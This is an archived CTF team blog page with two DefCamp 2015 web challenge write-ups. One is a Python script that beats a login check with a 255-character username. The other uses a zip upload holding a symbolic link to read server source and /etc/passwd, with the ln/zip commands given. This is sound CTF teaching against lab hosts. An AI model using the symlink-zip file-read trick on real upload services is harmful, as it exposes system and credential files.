CTF-Team site moved

The CTF-Team has launched a new web presence for their activities. The posts/write-ups below are kept as an archive for interested readers.

WRITEUP – DEFCAMP2015 – Rocket Science Admin Panel – Web 300

In this challenge we are given a register and a login page. After registration, we want to try to login, but we were automatically blocked. We wrote a python script to register and authenticate automatically. The last step we took, was to send a huge amount of characters to the server. Register an login failes and we get the register and login mask as a response. 1024 characters lead to a successful registration, but we got a “nop” as response by logging into the service. When we sent 255 a’s we got a successful login and the flag was given.

#!/usr/bin/python3

import urllib.request
import urllib.parse

href = 'http://10.13.37.4/'
params = {}

password = ["hey", "you"]

params['username'] = b'a'*255
params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"register.php", data)
print(urllib.request.urlopen(req).read())

params['password'] = password
data = urllib.parse.urlencode(params)
data = data.encode('ascii')
req = urllib.request.Request(href+"login.php", data)
print(urllib.request.urlopen(req).read())

WRITEUP – DEFCAMP2015 – The hylian dude – Web 200

In this challenge we are given a file hosting service. We can upload a zipped file, and the application provides the extracted files for download.

We found a comment in the HTML source, that shell_execute has been used. We tried to upload a zip file, with a symbolic link to /var/www/html/index.php, and we were able to download the source code. The next idea has been, to download /etc/passwd for further information.

ln -s /etc/passwd passwd
zip --symlinks -r passwd.zip passwd

There it is:

...
dctf:x:65533:65533:DCTF,,,:/nonexistent:/DCTF{28fad39245bc57404263540e94f417d8}